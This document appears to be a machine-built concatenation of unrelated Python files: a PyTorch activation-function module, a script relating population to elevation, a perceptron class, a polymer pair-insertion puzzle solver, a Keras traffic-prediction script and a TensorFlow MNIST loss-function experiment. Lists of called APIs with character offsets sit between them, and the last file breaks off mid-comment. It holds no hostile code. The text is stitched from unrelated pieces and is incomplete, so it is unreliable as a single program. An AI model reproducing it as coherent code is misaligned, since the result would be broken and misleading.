swish = tensormonk.activations.Activations(tensor_size, activation)
swish(torch.randn(1, *tensor_size[1:]))
"""
METHODS = ["elu", "gelu", "hsigm", "hswish", "lklu", "maxo", "mish",
"prelu", "relu", "relu6", "rmxo",
"selu", "sigm", "squash", "swish", "tanh"]
def __init__(self, tensor_size: tuple, activation: str = "relu", **kwargs):
super(Activations, self).__init__()
if activation is not None:
activation = activation.lower()
self.t_size = tensor_size
self.activation = activation
self.function = None
if activation not in self.METHODS:
raise ValueError("activation: Invalid activation " +
"/".join(self.METHODS) +
": {}".format(activation))
self.function = getattr(self, "_" + activation)
if activation == "prelu":
self.weight = nn.Parameter(torch.ones(1) * 0.1)
if activation == "lklu":
self.negslope = kwargs["lklu_negslope"] if "lklu_negslope" in \
kwargs.keys() else 0.01
if activation == "elu":
self.alpha = kwargs["elu_alpha"] if "elu_alpha" in \
kwargs.keys() else 1.0
self.tensor_size = tensor_size
if activation in ("maxo", "rmxo"):
t_size = list(tensor_size)
t_size[1] = t_size[1] // 2
self.tensor_size = tuple(t_size)
def forward(self, tensor: torch.Tensor) -> torch.Tensor:
if self.function is None:
return tensor
return self.function(tensor)
def _relu(self, tensor: torch.Tensor):
return F.relu(tensor)
def _relu6(self, tensor: torch.Tensor):
return F.relu6(tensor)
def _lklu(self, tensor: torch.Tensor):
return F.leaky_relu(tensor, self.negslope)
def _elu(self, tensor: torch.Tensor):
return F.elu(tensor, self.alpha)
def _gelu(self, tensor: torch.Tensor):
return F.gelu(tensor)
def _prelu(self, tensor: torch.Tensor):
return F.prelu(tensor, self.weight)
def _selu(self, tensor: torch.Tensor):
return F.selu(tensor)
def _tanh(self, tensor: torch.Tensor):
return torch.tanh(tensor)
def _sigm(self, tensor: torch.Tensor):
return torch.sigmoid(tensor)
def _maxo(self, tensor: torch.Tensor):
if not tensor.size(1) % 2 == 0:
raise ValueError("MaxOut: tensor.size(1) must be divisible by 2"
": {}".format(tensor.size(1)))
return torch.max(*tensor.split(tensor.size(1)//2, 1))
def _rmxo(self, tensor: torch.Tensor):
return self._maxo(F.relu(tensor))
def _swish(self, tensor: torch.Tensor):
return tensor * torch.sigmoid(tensor)
def _mish(self, tensor: torch.Tensor):
return tensor * F.softplus(tensor).tanh()
def _squash(self, tensor: torch.Tensor):
if not tensor.dim() == 3:
raise ValueError("Squash requires 3D tensors: {}".format(
tensor.dim()))
sum_squares = (tensor ** 2).sum(2, True)
return (sum_squares/(1+sum_squares)) * tensor / sum_squares.pow(0.5)
def _hsigm(self, tensor: torch.Tensor):
return F.relu6(tensor + 3) / 6
def _hswish(self, tensor: torch.Tensor):
return self._hsigm(tensor) * tensor
def __repr__(self):
return self.activation
@staticmethod
def available() -> list:
return Activations.METHODS
def flops(self) -> int:
import numpy as np
flops = 0
numel = np.prod(self.t_size[1:])
if self.activation == "elu":
# max(0, x) + min(0, alpha*(exp(x)-1))
flops = numel * 5
elif self.activation in ("lklu", "prelu", "sigm"):
flops = numel * 3
elif self.activation == "maxo":
# torch.max(*x.split(x.size(1)//2, 1))
flops = numel / 2
elif self.activation == "mish":
# x * tanh(ln(1 + e^x))
flops = numel * 5
elif self.activation == "relu":
# max(0, x)
flops = numel
elif self.activation == "relu6":
# min(6, max(0, x))
flops = numel * 2
elif self.activation == "rmxo":
# maxo(relu(x))
flops = int(numel * 1.5)
elif self.activation == "squash":
# sum_squares = (tensor**2).sum(2, True)
# (sum_squares/(1+sum_squares)) * tensor / sum_squares.pow(0.5)
flops = numel * 4 + self.t_size[1] * 2
elif self.activation == "swish":
# x * sigm(x)
flops = numel * 4
elif self.activation == "tanh":
# (exp(x) - exp(-x)) / (exp(x) + exp(-x))
flops = numel * 9
elif self.activation == "hsigm":
# min(6, max(0, x + 3)) / 6
flops = numel * 4
elif self.activation == "hswish":
# x * min(6, max(0, x + 3)) / 6
flops = numel * 8
return flops
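# ---------------------------------------------------------------------------
# Sketch (not part of the original module): quick checks of two of the less
# common activations defined above.
if __name__ == "__main__":
    caps = Activations(tensor_size=(None, 8, 4), activation="squash")
    out = caps(torch.randn(2, 8, 4))
    # squash rescales each capsule by ||s||^2 / (1 + ||s||^2), so norms stay < 1
    print(out.norm(dim=2).max())
    maxo = Activations(tensor_size=(None, 16, 4, 4), activation="maxo")
    print(maxo(torch.randn(1, 16, 4, 4)).shape)   # channels halved -> (1, 8, 4, 4)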
|
[
"torch.ones",
"torch.nn.functional.selu",
"torch.nn.functional.prelu",
"torch.nn.functional.relu6",
"torch.nn.functional.gelu",
"torch.sigmoid",
"torch.nn.functional.leaky_relu",
"torch.nn.functional.relu",
"torch.nn.functional.elu",
"torch.nn.functional.softplus",
"numpy.prod",
"torch.tanh"
] |
[((4037, 4051), 'torch.nn.functional.relu', 'F.relu', (['tensor'], {}), '(tensor)\n', (4043, 4051), True, 'import torch.nn.functional as F\n'), ((4112, 4127), 'torch.nn.functional.relu6', 'F.relu6', (['tensor'], {}), '(tensor)\n', (4119, 4127), True, 'import torch.nn.functional as F\n'), ((4187, 4222), 'torch.nn.functional.leaky_relu', 'F.leaky_relu', (['tensor', 'self.negslope'], {}), '(tensor, self.negslope)\n', (4199, 4222), True, 'import torch.nn.functional as F\n'), ((4281, 4306), 'torch.nn.functional.elu', 'F.elu', (['tensor', 'self.alpha'], {}), '(tensor, self.alpha)\n', (4286, 4306), True, 'import torch.nn.functional as F\n'), ((4366, 4380), 'torch.nn.functional.gelu', 'F.gelu', (['tensor'], {}), '(tensor)\n', (4372, 4380), True, 'import torch.nn.functional as F\n'), ((4441, 4469), 'torch.nn.functional.prelu', 'F.prelu', (['tensor', 'self.weight'], {}), '(tensor, self.weight)\n', (4448, 4469), True, 'import torch.nn.functional as F\n'), ((4529, 4543), 'torch.nn.functional.selu', 'F.selu', (['tensor'], {}), '(tensor)\n', (4535, 4543), True, 'import torch.nn.functional as F\n'), ((4603, 4621), 'torch.tanh', 'torch.tanh', (['tensor'], {}), '(tensor)\n', (4613, 4621), False, 'import torch\n'), ((4681, 4702), 'torch.sigmoid', 'torch.sigmoid', (['tensor'], {}), '(tensor)\n', (4694, 4702), False, 'import torch\n'), ((5967, 5991), 'numpy.prod', 'np.prod', (['self.t_size[1:]'], {}), '(self.t_size[1:])\n', (5974, 5991), True, 'import numpy as np\n'), ((5056, 5070), 'torch.nn.functional.relu', 'F.relu', (['tensor'], {}), '(tensor)\n', (5062, 5070), True, 'import torch.nn.functional as F\n'), ((5141, 5162), 'torch.sigmoid', 'torch.sigmoid', (['tensor'], {}), '(tensor)\n', (5154, 5162), False, 'import torch\n'), ((5624, 5643), 'torch.nn.functional.relu6', 'F.relu6', (['(tensor + 3)'], {}), '(tensor + 3)\n', (5631, 5643), True, 'import torch.nn.functional as F\n'), ((3307, 3320), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (3317, 3320), False, 'import torch\n'), ((5231, 5249), 'torch.nn.functional.softplus', 'F.softplus', (['tensor'], {}), '(tensor)\n', (5241, 5249), True, 'import torch.nn.functional as F\n')]
|
from sedac_gpw_parser import population
import numpy as np
from matplotlib import pyplot as plt
import matplotlib.colors as colors
import os
file_lons = np.arange(-180, 180, 40)
file_lats = np.arange(90, -20, -50)
DATA_FOLDER = os.path.expanduser("~") + "/.srtm30/"
def get_population_data(country_id):
pop = population.Population(country_id=country_id)
pop.mask_invalid_data(below=0)
data = pop.population_array()
lat = pop.latitude_range()
lon = pop.longitude_range()
lonmin = lon.min()
lonmax = lon.max()
latmax = lat.max()
latmin = lat.min()
extent = (lonmin, lonmax, latmin, latmax)
return data, extent
def get_infiles(lonmin, lonmax, latmin, latmax):
print(lonmin, lonmax, latmin, latmax)
lonmask = (file_lons >= (lonmin - 40)) & (file_lons <= lonmax)
latmask = (file_lats >= latmin) & (file_lats <= (latmax + 50))
valid_lons = file_lons[lonmask]
valid_lats = file_lats[latmask]
latmax = np.round(latmax + 1/120, 8) # Add 1/120 because topographic data is with respect to UPPER LEFT corner
latmin = np.round(latmin + 1/120, 8) # Add 1/120 because topographic data is with respect to UPPER LEFT corner
lonmin = np.round(lonmin, 8)
lonmax = np.round(lonmax, 8)
n_lat = int(np.round((latmax - latmin) * 120) + 1)
n_lon = int(np.round((lonmax - lonmin) * 120) + 1)
full_data = np.zeros((n_lat, n_lon))
lat_offset = 0
for valid_lat in valid_lats:
#print(valid_lat, end="\r")
file_lat_range = np.round(np.arange(valid_lat, valid_lat-50, -1/120), 8)
valid_file_lat_range = (file_lat_range <= latmax) & (file_lat_range >= latmin)
n_row = valid_file_lat_range.sum()
lon_offset = 0
for valid_lon in valid_lons:
file_lon_range = np.round(np.arange(valid_lon, valid_lon+40, +1/120), 8)
valid_file_lon_range = (file_lon_range <= lonmax) & (file_lon_range >= lonmin)
n_col = valid_file_lon_range.sum()
if valid_lon < 0:
lon_pref = "W"
else:
lon_pref = "E"
if valid_lat < 0:
lat_pref = "S"
else:
lat_pref = "N"
infile = lon_pref + str(abs(valid_lon)).zfill(3) + lat_pref + str(abs(valid_lat)).zfill(2) + ".DEM"
with open(DATA_FOLDER+infile) as infile:
data = np.fromfile(infile, np.dtype('>i2')).reshape(6000, 4800)
print(valid_lat, valid_lon, "cutting data")
data = data[valid_file_lat_range]
data = data[:, valid_file_lon_range]
print("storing data")
full_data[lat_offset:lat_offset+n_row,lon_offset:lon_offset+n_col]=data
lon_offset += n_col
del data
lat_offset += n_row
return full_data
def truncate_colormap(cmap, minval=0.25, maxval=1.0, n=100):
new_cmap = colors.LinearSegmentedColormap.from_list(
'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),
cmap(np.linspace(minval, maxval, n)))
return new_cmap
def get_topomap():
colors_undersea = plt.cm.terrain(np.linspace(0, 0.17, 2))
colors_land = plt.cm.terrain(np.linspace(0.25, 1, 256))
all_colors = np.vstack((colors_undersea, colors_land))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
terrain_map = truncate_colormap(cmap=plt.get_cmap('terrain'))
terrain_map.set_under("#254DB3")
terrain_map.set_bad("0.5")
return terrain_map
def main(country_id, plot=True):
pop, extent = get_population_data(country_id=country_id)
lonmin, lonmax, latmin, latmax = extent
print("Getting topography data from disk...")
topo_data = get_infiles(lonmin, lonmax, latmin, latmax)
print("Removing empty cols")
contains_values = []
for col_id in range(pop.shape[1]):
print(col_id, pop.shape[1], end="\r")
if np.isfinite(pop[:, col_id]).any():
contains_values.append(col_id)
print(len(contains_values), pop.shape)
pop = pop[:, contains_values]
topo_data = topo_data[:, contains_values]
print("Removing empty rows")
contains_values = []
for row_id in range(pop.shape[0]):
print(row_id, pop.shape[1], end="\r")
if np.isfinite(pop[row_id]).any():
contains_values.append(row_id)
print(len(contains_values), pop.shape)
pop = pop[contains_values]
topo_data = topo_data[contains_values]
print("setting invalid values...")
#for i, _pop in enumerate(pop):
# print(i, len(pop), end="\r")
topo_data[np.isnan(pop)] = np.nan
print("Total population:", np.nansum(pop))
if plot:
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 9))
terrain_map = get_topomap()
ax1.imshow(topo_data, vmin=0, vmax=4000, cmap=terrain_map, rasterized=True)
ax2.imshow(pop, vmin=0, vmax=50)
plt.savefig("pop_topo.png")
return pop, topo_data
def distribution(pop, topo, return_total=False, plot=True, resolution=500,
max_elevation=20, add_noise=True):
mask = np.isfinite(topo)
topo = topo[mask]
pop = pop[mask]
    # Set artifacts with negative elevation to zero
topo[topo <= 0] = 0
#topo[topo == 0] += 0.5 * np.random.random((topo == 0).sum())
#topo[topo >= 0.5] += np.random.random((topo >= 0.5).sum()) - 0.5
if add_noise:
topo+= np.random.random(len(topo))
valid_topo = np.linspace(0, max_elevation, resolution)
results = np.zeros_like(valid_topo, dtype=float)
#total_population = pop.total_population()
for i, elevation in enumerate(valid_topo):
mask = topo <= elevation
#mask = topo == elevation
results[i] = pop[mask].sum()
total_population = np.sum(pop)
results /= total_population
#results = results.cumsum() / total_population
if plot:
f = plt.figure()
#plt.semilogy()
plt.plot(valid_topo, results)
plt.xlabel("Elevation x [m above sea level]")
plt.ylabel("Share of population living at or below x")
plt.savefig("population_elevation.png")
if return_total:
return valid_topo, results, total_population
else:
return valid_topo, results
if __name__ == "__main__":
pop, topo = main(840, plot=True)
distribution(pop, topo, plot=True)
|
[
"numpy.sum",
"numpy.isnan",
"matplotlib.pyplot.figure",
"numpy.arange",
"numpy.round",
"matplotlib.colors.LinearSegmentedColormap.from_list",
"numpy.zeros_like",
"numpy.isfinite",
"numpy.linspace",
"matplotlib.pyplot.subplots",
"numpy.nansum",
"matplotlib.pyplot.get_cmap",
"matplotlib.pyplot.ylabel",
"numpy.vstack",
"matplotlib.pyplot.plot",
"numpy.dtype",
"numpy.zeros",
"matplotlib.pyplot.xlabel",
"os.path.expanduser",
"matplotlib.pyplot.savefig",
"sedac_gpw_parser.population.Population"
] |
[((154, 178), 'numpy.arange', 'np.arange', (['(-180)', '(180)', '(40)'], {}), '(-180, 180, 40)\n', (163, 178), True, 'import numpy as np\n'), ((191, 214), 'numpy.arange', 'np.arange', (['(90)', '(-20)', '(-50)'], {}), '(90, -20, -50)\n', (200, 214), True, 'import numpy as np\n'), ((229, 252), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (247, 252), False, 'import os\n'), ((320, 364), 'sedac_gpw_parser.population.Population', 'population.Population', ([], {'country_id': 'country_id'}), '(country_id=country_id)\n', (341, 364), False, 'from sedac_gpw_parser import population\n'), ((993, 1022), 'numpy.round', 'np.round', (['(latmax + 1 / 120)', '(8)'], {}), '(latmax + 1 / 120, 8)\n', (1001, 1022), True, 'import numpy as np\n'), ((1108, 1137), 'numpy.round', 'np.round', (['(latmin + 1 / 120)', '(8)'], {}), '(latmin + 1 / 120, 8)\n', (1116, 1137), True, 'import numpy as np\n'), ((1223, 1242), 'numpy.round', 'np.round', (['lonmin', '(8)'], {}), '(lonmin, 8)\n', (1231, 1242), True, 'import numpy as np\n'), ((1256, 1275), 'numpy.round', 'np.round', (['lonmax', '(8)'], {}), '(lonmax, 8)\n', (1264, 1275), True, 'import numpy as np\n'), ((1404, 1428), 'numpy.zeros', 'np.zeros', (['(n_lat, n_lon)'], {}), '((n_lat, n_lon))\n', (1412, 1428), True, 'import numpy as np\n'), ((3346, 3387), 'numpy.vstack', 'np.vstack', (['(colors_undersea, colors_land)'], {}), '((colors_undersea, colors_land))\n', (3355, 3387), True, 'import numpy as np\n'), ((3406, 3473), 'matplotlib.colors.LinearSegmentedColormap.from_list', 'colors.LinearSegmentedColormap.from_list', (['"""terrain_map"""', 'all_colors'], {}), "('terrain_map', all_colors)\n", (3446, 3473), True, 'import matplotlib.colors as colors\n'), ((5255, 5272), 'numpy.isfinite', 'np.isfinite', (['topo'], {}), '(topo)\n', (5266, 5272), True, 'import numpy as np\n'), ((5637, 5678), 'numpy.linspace', 'np.linspace', (['(0)', 'max_elevation', 'resolution'], {}), '(0, max_elevation, resolution)\n', (5648, 5678), True, 'import numpy as np\n'), ((5693, 5731), 'numpy.zeros_like', 'np.zeros_like', (['valid_topo'], {'dtype': 'float'}), '(valid_topo, dtype=float)\n', (5706, 5731), True, 'import numpy as np\n'), ((5971, 5982), 'numpy.sum', 'np.sum', (['pop'], {}), '(pop)\n', (5977, 5982), True, 'import numpy as np\n'), ((3244, 3267), 'numpy.linspace', 'np.linspace', (['(0)', '(0.17)', '(2)'], {}), '(0, 0.17, 2)\n', (3255, 3267), True, 'import numpy as np\n'), ((3302, 3327), 'numpy.linspace', 'np.linspace', (['(0.25)', '(1)', '(256)'], {}), '(0.25, 1, 256)\n', (3313, 3327), True, 'import numpy as np\n'), ((4722, 4735), 'numpy.isnan', 'np.isnan', (['pop'], {}), '(pop)\n', (4730, 4735), True, 'import numpy as np\n'), ((4778, 4792), 'numpy.nansum', 'np.nansum', (['pop'], {}), '(pop)\n', (4787, 4792), True, 'import numpy as np\n'), ((4836, 4871), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {'figsize': '(12, 9)'}), '(1, 2, figsize=(12, 9))\n', (4848, 4871), True, 'from matplotlib import pyplot as plt\n'), ((5059, 5086), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""pop_topo.png"""'], {}), "('pop_topo.png')\n", (5070, 5086), True, 'from matplotlib import pyplot as plt\n'), ((6093, 6105), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6103, 6105), True, 'from matplotlib import pyplot as plt\n'), ((6134, 6163), 'matplotlib.pyplot.plot', 'plt.plot', (['valid_topo', 'results'], {}), '(valid_topo, results)\n', (6142, 6163), True, 'from matplotlib import pyplot as plt\n'), ((6172, 6217), 'matplotlib.pyplot.xlabel', 
'plt.xlabel', (['"""Elevation x [m above sea level]"""'], {}), "('Elevation x [m above sea level]')\n", (6182, 6217), True, 'from matplotlib import pyplot as plt\n'), ((6226, 6280), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Share of population living at or below x"""'], {}), "('Share of population living at or below x')\n", (6236, 6280), True, 'from matplotlib import pyplot as plt\n'), ((6289, 6328), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""population_elevation.png"""'], {}), "('population_elevation.png')\n", (6300, 6328), True, 'from matplotlib import pyplot as plt\n'), ((1293, 1326), 'numpy.round', 'np.round', (['((latmax - latmin) * 120)'], {}), '((latmax - latmin) * 120)\n', (1301, 1326), True, 'import numpy as np\n'), ((1348, 1381), 'numpy.round', 'np.round', (['((lonmax - lonmin) * 120)'], {}), '((lonmax - lonmin) * 120)\n', (1356, 1381), True, 'import numpy as np\n'), ((1558, 1604), 'numpy.arange', 'np.arange', (['valid_lat', '(valid_lat - 50)', '(-1 / 120)'], {}), '(valid_lat, valid_lat - 50, -1 / 120)\n', (1567, 1604), True, 'import numpy as np\n'), ((3133, 3163), 'numpy.linspace', 'np.linspace', (['minval', 'maxval', 'n'], {}), '(minval, maxval, n)\n', (3144, 3163), True, 'import numpy as np\n'), ((3516, 3539), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""terrain"""'], {}), "('terrain')\n", (3528, 3539), True, 'from matplotlib import pyplot as plt\n'), ((1847, 1893), 'numpy.arange', 'np.arange', (['valid_lon', '(valid_lon + 40)', '(+1 / 120)'], {}), '(valid_lon, valid_lon + 40, +1 / 120)\n', (1856, 1893), True, 'import numpy as np\n'), ((4044, 4071), 'numpy.isfinite', 'np.isfinite', (['pop[:, col_id]'], {}), '(pop[:, col_id])\n', (4055, 4071), True, 'import numpy as np\n'), ((4401, 4425), 'numpy.isfinite', 'np.isfinite', (['pop[row_id]'], {}), '(pop[row_id])\n', (4412, 4425), True, 'import numpy as np\n'), ((2488, 2503), 'numpy.dtype', 'np.dtype', (['""">i2"""'], {}), "('>i2')\n", (2496, 2503), True, 'import numpy as np\n')]
|
from __future__ import division, print_function
from typing import List, Tuple, Callable
import numpy as np
import scipy
import matplotlib.pyplot as plt
class Perceptron:
def __init__(self, nb_features=2, max_iteration=10, margin=1e-4):
'''
Args :
nb_features : Number of features
            max_iteration : maximum iterations. Your algorithm should terminate after this
                many iterations even if it has not converged
            margin : the minimum threshold; it is used instead of comparing against 0 in the algorithm
'''
self.nb_features = nb_features
self.w = [0 for i in range(0,nb_features+1)]
self.margin = margin
self.max_iteration = max_iteration
def train(self, features: List[List[float]], labels: List[int]) -> bool:
'''
Args :
features : List of features. First element of each feature vector is 1
to account for bias
labels : label of each feature [-1,1]
Returns :
True/ False : return True if the algorithm converges else False.
'''
seq = [x for x in range(len(features))]
threshold = self.margin / 2
converge = False
scale = np.linalg.norm(features)
for iteration in range(self.max_iteration):
if converge:
break
converge = True
np.random.shuffle(seq)
for i in seq:
pred = np.dot(self.w, features[i])
y = 0
if pred > threshold:
y = 1
elif pred < -threshold:
y = -1
if y != labels[i]:
self.w = np.add(self.w, np.dot(labels[i], features[i]))
converge = False
self.w = self.w.tolist()
return converge
def reset(self):
self.w = [0 for i in range(0,self.nb_features+1)]
def predict(self, features: List[List[float]]) -> List[int]:
'''
Args :
features : List of features. First element of each feature vector is 1
to account for bias
Returns :
labels : List of integers of [-1,1]
'''
return np.apply_along_axis(lambda x : 1 if np.dot(self.w, x) > 0 else -1, 1, features)
def get_weights(self) -> List[float]:
return self.w
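# Minimal usage sketch (hypothetical data, not from the original file). Each feature
# vector starts with a constant 1 to account for the bias, as the docstrings require:
#
#   clf = Perceptron(nb_features=2, max_iteration=10)
#   X = [[1, 0.5, -1.2], [1, -0.3, 0.8], [1, 2.0, 1.5]]
#   y = [1, -1, 1]
#   converged = clf.train(X, y)
#   predictions = clf.predict(X)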
|
[
"numpy.dot",
"numpy.linalg.norm",
"numpy.random.shuffle"
] |
[((1280, 1304), 'numpy.linalg.norm', 'np.linalg.norm', (['features'], {}), '(features)\n', (1294, 1304), True, 'import numpy as np\n'), ((1444, 1466), 'numpy.random.shuffle', 'np.random.shuffle', (['seq'], {}), '(seq)\n', (1461, 1466), True, 'import numpy as np\n'), ((1516, 1543), 'numpy.dot', 'np.dot', (['self.w', 'features[i]'], {}), '(self.w, features[i])\n', (1522, 1543), True, 'import numpy as np\n'), ((1775, 1805), 'numpy.dot', 'np.dot', (['labels[i]', 'features[i]'], {}), '(labels[i], features[i])\n', (1781, 1805), True, 'import numpy as np\n'), ((2360, 2377), 'numpy.dot', 'np.dot', (['self.w', 'x'], {}), '(self.w, x)\n', (2366, 2377), True, 'import numpy as np\n')]
|
import numpy as np
import os
import time
np.set_printoptions(threshold=np.inf)
def input(fname):
day_dir = os.path.realpath(__file__).split('/')[:-1]
fname = os.path.join('/',*day_dir, fname)
data = []
with open(fname) as f:
for line in f:
data.append(line.strip())
return data
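# The two helpers below track pair counts instead of building the polymer string itself:
# every insertion step turns a pair AB into the two pairs A+inserted and inserted+B, so
# only the multiset of pairs grows. When element counts are recovered from the pairs,
# each element is shared by two adjacent pairs and is weighted by 0.5; the two ends of
# the seed template occur in only one pair each, so 0.5 is added back for both of them.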
def count_ele(pairs):
elem_count = {e: 0 for e in rules.values()}
for pair in pairs:
elem_count[pair[0][0]] += 0.5*pair[1]
elem_count[pair[0][1]] += 0.5*pair[1]
elem_count[seed[0]] += 0.5
elem_count[seed[-1]] += 0.5
return elem_count
def do_steps(pairs, rules, n):
for i in range(n):
new_pairs = []
for pair in pairs:
insertion = rules[pair[0]]
new_pairs.extend([(pair[0][0]+insertion, pair[1]), (insertion+pair[0][1], pair[1])])
counts = {p: 0 for p in set(np.array(new_pairs)[:,0])}
for n in new_pairs:
counts[n[0]] += n[1]
pairs = [(p, counts[p]) for p in counts]
elem_count = count_ele(pairs)
min_ele = min(elem_count, key=elem_count.get)
max_ele = max(elem_count, key=elem_count.get)
print(int(elem_count[max_ele] - elem_count[min_ele]))
rules = input('input.txt')
# rules = input('test-input.txt')
seed = rules[0]
rules = {d.split(' ')[0]: d.split(' ')[2] for d in rules[2:]}
unique_pairs = set([seed[i]+seed[i+1] for i in range(len(seed)-1)])
pairs = [(p, list(unique_pairs).count(p)) for p in unique_pairs]
# part 1
t0 = time.time()
print('Part 1:')
do_steps(pairs, rules, 10)
print('Elapsed time:',time.time()-t0,' sec')
# part 2
t0 = time.time()
print('\nPart 2:')
do_steps(pairs, rules, 40)
print('Elapsed time:',time.time()-t0,' sec')
|
[
"numpy.set_printoptions",
"os.path.realpath",
"time.time",
"numpy.array",
"os.path.join"
] |
[((42, 79), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'np.inf'}), '(threshold=np.inf)\n', (61, 79), True, 'import numpy as np\n'), ((1513, 1524), 'time.time', 'time.time', ([], {}), '()\n', (1522, 1524), False, 'import time\n'), ((1629, 1640), 'time.time', 'time.time', ([], {}), '()\n', (1638, 1640), False, 'import time\n'), ((168, 202), 'os.path.join', 'os.path.join', (['"""/"""', '*day_dir', 'fname'], {}), "('/', *day_dir, fname)\n", (180, 202), False, 'import os\n'), ((1591, 1602), 'time.time', 'time.time', ([], {}), '()\n', (1600, 1602), False, 'import time\n'), ((1709, 1720), 'time.time', 'time.time', ([], {}), '()\n', (1718, 1720), False, 'import time\n'), ((113, 139), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (129, 139), False, 'import os\n'), ((884, 903), 'numpy.array', 'np.array', (['new_pairs'], {}), '(new_pairs)\n', (892, 903), True, 'import numpy as np\n')]
|
from keras.models import load_model
# from matplotlib.font_manager import FontProperties
import cv2
import numpy as np
import exptBikeNYC
size =10
model = exptBikeNYC.build_model(False)
model.load_weights('MODEL/c3.p3.t3.resunit4.lr0.0002.best.h5')
f = open("area.csv", "r")
# Temporary list for the counts at one time step
person_num = []
# Stores the counts for all time steps; each entry is reshaped to (16, 8)
imgs = []
i, l = 0, 0
for line in f:
l += 1
if l == 1:
continue
i += 1
line = line.strip().split(',')
    # Scale the counts to values below 1; convert back later to recover the actual counts
number = (float(line[2]) - 0) / (3073 - 0) * 2 - 1
person_num.append(number)
    # Read one block of 128 values (16 x 8) at a time
if i % (128) == 0:
        # Convert into a one-dimensional array
person_num = np.array(person_num)
        # Reshape into an image-like form
person_num = person_num.reshape(16, 8)
imgs.append(person_num)
i = 0
person_num = []
# Training data (three types of input, each converted into multi-channel form)
train_x1, train_x2, train_x3, train_y = [], [], [], []
for i in range(1300, 1305):
    # Take the short-term, period, and trend components, each a sequence with different lags
image1 = [imgs[i - 3], imgs[i - 2], imgs[i - 1]]
image2 = [imgs[i - 72], imgs[i - 48], imgs[i - 24]]
image3 = [imgs[i - 484], imgs[i - 336], imgs[i - 168]]
train_x1.append(image1)
train_x2.append(image2)
train_x3.append(image3)
lab = [imgs[i]]
    train_y.append(lab) # final output
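# These offsets appear to follow the closeness/period/trend input scheme of
# ST-ResNet-style models: the 1-3 most recent frames, the frames 24/48/72 steps back
# (daily periodicity), and the frames 168/336/484 steps back as a longer-term trend.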
train_x = [np.array(train_x1), np.array(train_x2), np.array(train_x3)]
train_y = np.array(train_y)
# X_test, Y_test=exptBikeNYC.main()
predict_y = model.predict(train_x)
print((train_y+1)/2*3073)
print(((predict_y+1)/2*3073).astype(int))
# print((predict_y*(60923+192687)-192687))
|
[
"exptBikeNYC.build_model",
"numpy.array"
] |
[((156, 186), 'exptBikeNYC.build_model', 'exptBikeNYC.build_model', (['(False)'], {}), '(False)\n', (179, 186), False, 'import exptBikeNYC\n'), ((1330, 1347), 'numpy.array', 'np.array', (['train_y'], {}), '(train_y)\n', (1338, 1347), True, 'import numpy as np\n'), ((1260, 1278), 'numpy.array', 'np.array', (['train_x1'], {}), '(train_x1)\n', (1268, 1278), True, 'import numpy as np\n'), ((1280, 1298), 'numpy.array', 'np.array', (['train_x2'], {}), '(train_x2)\n', (1288, 1298), True, 'import numpy as np\n'), ((1300, 1318), 'numpy.array', 'np.array', (['train_x3'], {}), '(train_x3)\n', (1308, 1318), True, 'import numpy as np\n'), ((646, 666), 'numpy.array', 'np.array', (['person_num'], {}), '(person_num)\n', (654, 666), True, 'import numpy as np\n')]
|
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
from datetime import datetime
LOGDIR = '/tmp/17springAI/mnist/objectiveFunc/' + datetime.now().strftime('%Y%m%d-%H%M%S') + '/'
def activation(act_func, logit):
if act_func == "relu":
return tf.nn.relu(logit)
else:
return tf.nn.sigmoid(logit)
def logits(input, size_in, size_out):
w = tf.Variable(tf.truncated_normal([size_in, size_out], stddev=0.1), name="W")
b = tf.Variable(tf.constant(0.1, shape=[size_out]), name="B")
logit = (tf.matmul(input, w) + b)
tf.summary.histogram("weights", w)
tf.summary.histogram("biases", b)
tf.summary.histogram("logits", logit)
return logit, w, b
# fully conected layer
def fc_layer(input, size_in, size_out,act_func, name="fc" ):
with tf.name_scope(name):
logit, w, b = logits(input, size_in, size_out)
act = activation(act_func, logit)
tf.summary.histogram("weights", w)
tf.summary.histogram("biases", b)
tf.summary.histogram("activations", act)
return act, w, b
# runs different model each time, hparam is a string specification for the model
# hparam is also used in the created tensorboard summary
def mnist_model(learning_rate, objectiveFunc, hparam, act_func):
tf.reset_default_graph()
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.4)))
# input layer
x = tf.placeholder(tf.float32, [None, 784], name="x")
x_image = tf.reshape(x, [-1, 28, 28, 1])
# to view images on tensorboard
tf.summary.image('input', x_image, 3)
# label to compare
y_ = tf.placeholder(tf.float32, [None, 10], name="labels")
keep_prob = tf.placeholder(tf.float32)
h1, W1, B1 = fc_layer(x, 784, 100, act_func, "h1")
logit, W2, B2 = logits(h1, 100, 10)
Y = tf.nn.softmax(logit)
## changing loss function
if objectiveFunc == "mean_sq_err":
with tf.name_scope("mean_sq_err"):
mean_sq_err = tf.reduce_mean(tf.contrib.keras.losses.mean_squared_error(Y, y_))
tf.summary.scalar("mean_sq_err", mean_sq_err)
loss = mean_sq_err
elif objectiveFunc == "L2_norm":
with tf.name_scope("L2_norm"):
xent = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(
logits=logit, labels=y_), name="xent")
L2_lambda = 0.05
L2_norm = xent + \
L2_lambda * (tf.nn.l2_loss(W1) + tf.nn.l2_loss(B1) + tf.nn.l2_loss(W2) + tf.nn.l2_loss(B2))
tf.summary.scalar("L2_norm", L2_norm)
loss = L2_norm
else:
with tf.name_scope("xent"):
xent = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(
logits=logit, labels=y_), name="xent")
tf.summary.scalar("xent", xent)
loss = xent
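    # The three objectives compared above: "mean_sq_err" is the mean squared error
    # between the softmax output and the one-hot labels; "L2_norm" is softmax
    # cross-entropy plus an L2 penalty (lambda = 0.05) on both layers' weights and
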